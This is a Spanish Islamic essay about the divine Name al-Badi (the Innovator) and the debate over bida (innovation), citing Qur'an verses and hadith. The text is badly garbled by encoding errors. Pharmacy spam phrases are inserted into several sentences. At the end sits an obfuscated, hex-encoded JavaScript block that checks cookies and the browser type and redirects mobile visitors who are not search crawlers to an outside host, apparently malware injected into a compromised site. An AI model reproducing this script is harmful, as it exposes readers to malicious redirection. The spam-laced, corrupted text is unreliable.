Alkalima

Al-Badi, el Innovador: un Nombre olvidado de Al-lA?h

Al-Badi, el Innovador, es uno de los bellos Nombres, contenidos en el CorA?n generoso, a travAi??s de los cuales los musulmanes podemos referirnos a Al-lA?h. Lo cual nos lleva a pensar, de entrada, que allAi?? donde hay innovaciA?n se manifiesta el Nombre de Al-lA?h al-Badi.

Se trata de un Nombre que merece ser rememorado, especialmente en estos tiempos, cuyo conocimiento y adopciA?n pueden ayudarnos a vivir el din del islam de un modo mA?s pleno, al mismo tiempo que ayudar a la ummah a superar el tradicionalismo inane, insha Al-lA?h. A pesar de ello, no lo oAi??mos demasiado a menudo en boca de los musulmanes. MA?s bien, la palabra bida (innovaciA?n) es utilizada generalmente en un sentido negativo, a causa de un hadiz (y otros semejantes) segA?n el cual el Mensajero de Al-lA?h habrAi??a dicho: Ai??Cuidado con las innovaciones, porque toda novedad es una innovaciA?n, y toda innovaciA?n es un extravAi??o, y todo extravAi??o lleva al InfiernoAi??. Esto nos lleva a la pregunta: A?cA?mo es posible que siendo Al-lA?h el Innovador toda innovaciA?n sea rechazada? Como veremos, esto no es en absoluto cierto. Para comprender esta aparente contradicciA?n, debemos situarnos en el plano mA?s amplio de la cosmologAi??a corA?nica como un todo, lo cual nos abre a una visiA?n dinA?mica capaz de integrar aspectos en apariencia contradictorios. Pues solo hay contradicciA?n desde la lA?gica formal, en la medida en que no tiene en cuenta el dinamismo propio de la vida. Precisamente de esto se trata cuando hablamos de al-Badi.

La trilAi??tera BAi??-DAi??L-AYN aparece cuatro veces en el CorA?n, de modo que resulta posible el citarlas todas.

Ai??l es el Originador (badai??i??Ai??u) de los cielos y de la tierra:
cuando decreta la existencia de algo, le dice tan sA?lo:
Ai??SAi??Ai?? ai??i??y es.
(CorA?n 2: 117)

A?Ai??l estA? sublimemente exaltado por encima
de cuanto los hombres puedan concebir para definirle:
el Originador (badai??i??Ai??u) de los cielos y de la tierra!
(CorA?n 6:100-101) cheap pills

En estos dos versAi??culos el tAi??rmino se refiere a Al-lA?h y su sentido es positivo. No sucede lo mismo con los otros dos. El primero habla de la instauraciA?n del monacato cristiano:

En cuanto al monacato ai??i??no se lo ordenamos Nosotros:
lo inventaron ellos (ibai??i??tadaai??i??Ai??hA?) buscando la complacencia de Al-lA?h.
(CorA?n 57:27)

En el A?ltimo, el Profeta habla de sAi?? mismo en estos tAi??rminos:

Ai??No soy un innovador (bidai??i??A?n) entre los mensajerosai??i??Ai??
(CorA?n 46:9)

Una raAi??z relacionada es BAi??-DAi??L-HAMZA, que aparece 15 veces, con el sentido de empezar o iniciar, y es traducida a menudo tambiAi??n como originar. El carA?cter de Innovador o de Originador de algo nuevo/original es consustancial a la imagen corA?nica de una divinidad dinA?mica, que no cesa de crear:

Al-lA?h crea en un principio, y luego lo suscita de nuevo.
(CorA?n 30: 11 y CorA?n 30: 27)

AAi??ade a Su creaciA?n lo que Ai??l quiere:
pues, ciertamente, Al-lA?h tiene el poder para disponer cualquier cosa.
(CorA?n 35:1)

Y hemos creado los cielos y la tierra
y todo lo que hay entre ellos en seis eras,
y el cansancio jamA?s nos afecta.
(CorA?n 50: 38)

De Ai??l dependen todas las criaturas en los cielos y en la tierra;
[y] cada dAi??a se manifiesta en otra faceta.
(CorA?n 55: 29)

Siendo Al-lA?h el Creador (al-Jaliq) resulta evidente que una de sus caracterAi??sticas es la creatividad. A?Y quAi?? creatividad! Basta mirar para darse cuenta: la emergencia incesante de la vida, la apariciA?n de nuevas formas, la constante recreaciA?n de lo existente, el cambio y la no permanencia de lo ente. Hay varios nombres que aluden a esta potencia creadora de Al-lA?h. La particularidad de al-Badi radica en que lo creado es algo completamente nuevo.

He dicho que se trata de un Nombre olvidado, lo cual es seguramente una exageraciA?n. Lo que quiero hacer notar es cA?mo este Nombre no es por lo comA?n actualizado, no se valora la innovaciA?n como algo divino. MA?s bien, nos situamos en un momento de conservadurismo. Solo la gente de conocimiento y la gente del recuerdo trabajan para preservar, recordar, conocer, honrar y actualizar el Nombre de Al-lA?h al-Badi.

Hablar de los Nombres de Al-lA?h no es hacer teologAi??a. Conocer a nuestro Sustentador es una obligaciA?n, nos ayuda a profundizar e iluminar nuestra prA?ctica del din de Al-lA?h, y evitarnos caer en aquello que el CorA?n denuncia de forma tan contundente: el seguimiento ciego de la religiA?n de los antepasados.

El conocimiento es la clave, la llave es el recuerdo. Desde el recuerdo del Nombre de Al-lA?h al-Badi, debemos hablar de un conocimiento dinA?mico y no estA?tico, no la repeticiA?n mecA?nica de doctrinas, ni un racionalismo orgulloso de sAi?? mismo, sino la apertura del intelecto a la revelaciA?n-creaciA?n constante que Al-lA?h opera sobre el mundo. Y es allAi?? donde vemos como el Nombre de Al-lA?h al-Badi se nos presenta como un deslumbramiento, como conciencia de que la CreaciA?n se renueva a cada instante, de que somos creados una y otra vez desde la nada, y que en cada nueva creaciA?n nacemos a la vida, siempre renovados. Somos por tanto capaces de cambiar, de mejorar, de crecer, de transformarnos, de romper con la inercia y con los malos hA?bitos, si Al-lA?h quiere. Interiorizar y vivenciar este Nombre divino puede ayudarnos a salir de aquellas situaciones en las cuales el peso de lo real nos abruma y no encontramos ninguna salida aparente. En esos momentos en los cuales el mundo parece cerrarse a nuestro alrededor solo queda una posibilidad: ofrecer una respuesta creativa que rompa con el muro en el cual estamos atrapados. La innovaciA?n es necesaria para preservar el din, para contribuir a que conserve y renueve toda su belleza, toda su potencia liberadora, toda su capacidad de colmar las aspiraciones de los creyentes.

De ahAi?? la gravedad del olvido de este Nombre. Pero hay algo todavAi??a peor: es un Nombre negado y rechazado, del cual muchos musulmanes parecen haber renegado. En estos tiempos oAi??mos repetirse mucho la palabra bida antabuse online india como algo necesariamente negativo, usada para descalificar cualquier pensamiento creativo dentro del islam. Ya no se puede intercambiar, crear, pensar por uno mismo, pues toda innovaciA?n es rechazada.

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El musulmA?n contemporA?neo se ve forzado a enfrentarse a temas polAi??micos, pues estA?n en el ambiente: la lapidaciA?n, la poligamia, los malos tratos, el abortoai??i?? Al tratar de dar respuestas, una prA?ctica comA?n es la remisiA?n a lo ya sabido y a lo ya interpretado: los grandes sabios del islam han dado ya respuestas a todas las cuestiones. Y, sin embargo, a veces estas no son satisfactorias, aparecen argumentos que cuestionan las interpretaciones dominantes y proponen nuevas interpretaciones. Esto suscita el rechazo de los devotos de los ulemas oficiales. En el momento en el cual los argumentos desaparecen, el A?ltimo recurso es la acusaciA?n de bida: todo aquel que propone una nueva interpretaciA?n es tachado de innovador.

Quisiera prevenir contra esta prA?ctica, por varios motivos importantes:

1) Es muy grave. El hadiz que hemos citado dice: toda innovaciA?n es un extravAi??o, y todo extravAi??o lleva al Infierno. La acusaciA?n de bida debe tomarse en serio, pues es prA?cticamente equivalente al takfir. Esto es algo que no puede decirse a la ligera.

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2) Niega el Nombre de purchase compazine dosage Al-lA?h al-Badi, coaccionando a los musulmanes para que no vivencien dicho Nombre, de modo que su relaciA?n con Al-lA?h queda mutilada.

3) Constituye una manipulaciA?n de la Sunna del profeta Muhammad. En este sentido, la propia expresiA?n Ai??toda innovaciA?n es nocivaAi??Ai??constituye una falsedad. Pues existen hadices en los que la innovaciA?n aparece como algo positivo. Quienes utilizan dicha expresiA?n estA?n ocultando que el Mensajero de Al-lA?h afirmA? que existen bida hasanat, y que hay hadices donde alaba a algunos de sus contemporA?neos por su actitud innovadora. A?Ignoran los ulemas oficiales estos hadices o los ocultan ex profeso?

4) El calificar cualquier opiniA?n no oficial como bida negativa es un mAi??todo para acabar con la libertad de conciencia y con la creatividad de los creyentes, encorsetados en una tradiciA?n y en unas formas que ya no pueden ser ni siquiera discutidas. Ahoga y conduce a la parA?lisis y al tradicionalismo. Como consecuencia, provoca que las gentes mA?s creativas se alejen del islam, buscando en el arte o en otros campos un espacio en el cual desarrollar su creatividad.

5) Notar tambiAi??n el sectarismo: muchas veces se rechaza como innovaciA?n infame aquello que va contra lo que uno considera como firmemente establecido. Pero A?con quAi?? base? Es decir: se parte de una visiA?n ya considerada como la A?nica posible y se acusa a los que no se adaptan a ella de innovar. Pues la cuestiA?n es: A?con respecto a quAi?? es bueno o malo el innovar? La respuesta solo puede ser: segA?n lo establecido en el CorA?n y en la Sunna del Profeta. Lo cual no puede hacerse extensivo ni al kalam, ni al fiqh o al tafsir tradicional.

Muchas de las prA?cticas o de las interpretaciones que hoy se consideran como firmemente establecidas fueron consideradas como una innovaciA?n en su momento. Los ejemplos podrAi??an llenar un libro. Esto constituye, precisamente, algo que tiene a su favor el islam tradicional: el ser el fruto de un esfuerzo creativo por implementar el mensaje del CorA?n y la Sunna del Profeta en un contexto dado.

Sobre grandes innovaciones que han pasado al acerbo comA?n de los musulmanes, podrAi??a escribirse un libro. Si consideramos como innovaciA?n todo aquello que no estA? claramente estipulado en el CorA?n o viene dado por la Sunna, nos darAi??amos cuenta de que el islam tradicional es una gran innovaciA?n. Basta citar un ejemplo para darse cuenta de lo que estamos hablando: existe unanimidad en atribuir el establecimiento del calendario de la hAi??gira a Omar ibn al-Jattab. Todos los que aceptan dicho calendario aceptan una innovaciA?n.

Quisiera por todo ello prevenir contra aquellos que usan el no argumento de la bida para zanjar cualquier disputa. Quienes asAi?? lo hacen estA?n, sin darse cuenta, depreciando la propia tradiciA?n que pretenden preservar. Su actitud podrAi??a volverse contra ellos, como de hecho ya sucede.

Vale la pena leer un hadiz transmitido por Abu Huraira, contenido en el Sahih de al-Bujari. Lo encontramos tambiAi??n en Los jardines de los justos de Imam Nawawi, en el libro 7, hadiz nA? 1516. AquAi?? solo citamos la parte final, en la cual se relata la ejecuciA?n de Jubaib, uno de los sahaba. Al principio, el hadiz nos relata una expediciA?n en la cual Asim actA?a como emir, y en la cual Jubaib fue capturado por el Quraish, siendo vendido como esclavo en Meka:

PermaneciA? Jubaib cautivo con ellos, los meses sagrados hasta que resolvieron matarlo. Primeramente pidiA? prestada una navaja para afeitarse el pubis y purificarse a una de las hijas de Al HA?riz, y Ai??sta se la prestA?. (ai??i??) Cuando salieron con Ai??l fuera del lAi??mite sagrado de Meca, para matarlo, les pidiA?: Ai??A?Dejadme que rece dos rakas!Ai?? Lo dejaron rezar y dijo: Ai??A?Por Al-lA?h! que si no fuera porque pensarAi??ais que estoy angustiado por la muerte, alargarAi??a mi oraciA?n: A?Oh Al-lA?h, cuAi??ntalos en nA?mero y haz que mueran de uno en uno, sin que quede tan sA?lo uno!Ai?? (ai??i??) Y asAi?? fue como Jubaib instaurA? la Sunna para todo musulmA?n de rezar pacientemente antes de ser ejecutado. (ai??i??).

Lo relatA? Al Bujari.

Recalcamos la frase final, en la cual se afirma que un hombre distinto del Profeta instaura una Sunna (una tradiciA?n) vA?lida para todos los musulmanes. MA?s allA? de lo que esto nos parezca, lo que es indudable es que ha sido ampliamente aceptado en la historia del islam, y precisamente por aquellos que los tradicionalistas actuales tienen como referentes de aquel islam con respecto al cual toda innovaciA?n les parece infame.

El Mensajero de Al-lA?h no estaba en absoluto en contra de todas las innovaciones. Por el contrario, la Sira nos enseAi??a otra cosa. SerAi??a prolijo citar todas las narraciones que validan lo que acabamos de decir. Con una bastarA?, pues en Ai??l vemos al Profeta manifestando su aprobaciA?n a una prA?ctica innovadora que modificaba la estructura de una ibada tan fundamental como es el yumua. Lo compilA? Muslim y tambiAi??n lo encontramos en Los jardines de los justos, incluido en el apartado De quien origina una Sunna, sea buena o mala:

De Yarir ibn Abdallah se transmitiA? que dijo:

Ai??EstA?bamos a media maAi??ana con el Mensajero de Al-lA?h cuando vino a Ai??l una gente casi desnuda y harapienta, con sus espadas al cuello. La mayorAi??a o todos ellos eran de la tribu de Mudar. El Mensajero de Al-lA?h se conmoviA? profundamente por la pobreza que vio en ellos. EntrA? en su casa y saliA? para ordenar a Bilal que llamara a la oraciA?n.

Y despuAi??s de rezar hablA? a la gente diciendo:

-A?Oh hombres! Temed a vuestro SeAi??or, que os ha creado a todos de un mismo ser, generando a partir de ambos muchos hombres y mujeres. A?Temed a Al-lA?h, Aquel por el que pedAi??s y guardaos de romper los lazos consanguAi??neos! Y Al-lA?h observa lo que hacAi??is-. (CompletA? el A?yat).

order clomid, order clomid. DespuAi??s recitA? otro A?yat del final del sura “La ReuniA?n”:

-A?Oh creyentes! Temed a Al-lA?h y que cada uno vea lo que aporta para el dAi??a del Juicio. A?Que dAi?? sA?daqa el hombre de sus dinares, o de sus dirhams, o de su vestido o trigo o dA?tiles!

Hasta decir: (A?Aunque sea medio dA?til!)

Y vino un hombre de los auxiliares de Medina con una bolsa pesada llena de dinero que casi no podAi??a con ella. DespuAi??s lo siguiA? la gente hasta que vi dos montones de comida y ropa. Y entonces vi relucir de alegrAi??a el rostro del Mensajero de Al-lA?h de forma pura y brillante.

Pues dijo: -Para quien establece una buena sunna en el islam, la recompensa de su acciA?n y de la de quien sigue su ejemplo, sin que disminuya en nada la recompensa de los que la siguieron. Y sobre quien establece una mala costumbre en el islam, cae su falta y la de los que la siguieron sin que disminuya nada la de ellos. Ai??

A?QuAi?? hermoso hadiz! Por un lado, nos muestra el carA?cter solidario y abierto del Profeta, su predisposiciA?n a aceptar todo lo bueno, fuese cual fuese su origen. Pues lo que estA? en juego no es una fantasmagA?rica pureza doctrinal, sino la lucha contra el hambre, contra la injusticia. Una vez mA?s, la compasiA?n es el criterio. El amor es el criterio, la solidaridad es el criterio. No la fidelidad a las normas establecidas, ni el ser estricto con las formas.

A?Por quAi??, entonces, el Mensajero de Al-lA?h afirma que las innovaciones conducen al Fuego? Lo decisivo, en este punto, es comprender que las innovaciones contra las que nos previene el Mensajero de Al-lA?h son de cierto tipo. Para esto hay que volver a situarse en el corazA?n de la cosmologAi??a corA?nica, de cara a encontrar el equilibrio y evitar tanto el inmovilismo inane como las innovaciones destructivas. Pues si Al-lA?h es al-Badi, tambiAi??n es al-Hafiz. Si es el que innova a cada paso, es tambiAi??n el que conserva, retiene y mantiene las cosas en su sitio: el Preservador, o el Conservador.

Debemos pues considerar la otra parte, buscar el equilibrio. El islam es un todo integrado, no puede fragmentarse sin perderse. Al-lA?h nos previene en el CorA?n de seguir tan solo aquello que nos interese, aquella parte del Mensaje que se adapta a nuestro temperamento. En este caso, no podemos vivenciar el Nombre de Al-lA?h al-Badi sin tener en cuenta a Al-lA?h como al-Hafiz. Pero tampoco lo contrario. AhAi?? esta la clave, la resoluciA?n de los conflictos, en la bA?squeda del equilibrio.

Para superar las diferencias entre innovadores y conservadores, debemos partir de la base de que los Nombres al-Hafiz y al-Badi no se contradicen, en el mismo sentido que no son contradictorios el Primero y el Asltimo o el Manifiesto y el Oculto. Son Nombres que se completan el uno al otro. En la CreaciA?n de Al-lA?h sell price of cephalexin 500 mg existen fuerzas de cambio y de permanencia, momentos de expansiA?n y de concentraciA?n, cuyo equilibrio es la garantAi??a de su Ai??xito. Nosotros podemos percibir al mismo tiempo como todo cambia y todo permanece.

El islam es muy hermoso. Nos sitA?a en el camino del encuentro, si Al-lA?h quiere. No tiene nada que ver con nuestros caprichos ni con nuestras opiniones, sino con el poner la confianza en el Creador. Debemos por ello dejar de considerar el Nombre de Al-lA?h al-Badi como algo que se relacione con la subjetividad humana. No nos relacionamos con este Nombre si meramente lo usamos como excusa para justificar nuestras interpretaciones personales. Y aquAi?? tenemos la clave del rechazo de la innovaciA?n en el islam, que debemos comprender e integrar para que la verdadera renovaciA?n sea posible: cualquier innovaciA?n que no tenga por motivo dicha preservaciA?n debe ser descartada como un capricho. Pero nosotros estamos implicados en el dinamismo de la vida en tanto seres humanos concretos, como individuos contingentes. Por eso, no se trata tampoco de no pensar por nosotros mismos, dejando toda respuesta en manos de los expertos o de los sabios del pasado. MA?s bien, se trata de entrar en el fluir de una existencia siempre renovada. Y de allAi?? tomar la fuerza para afrontar los retos del presente, con el permiso de Al-lA?h.

Una vez mA?s: el islam es el camino de en medio.

Y Al-lA?h es el que sabe.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 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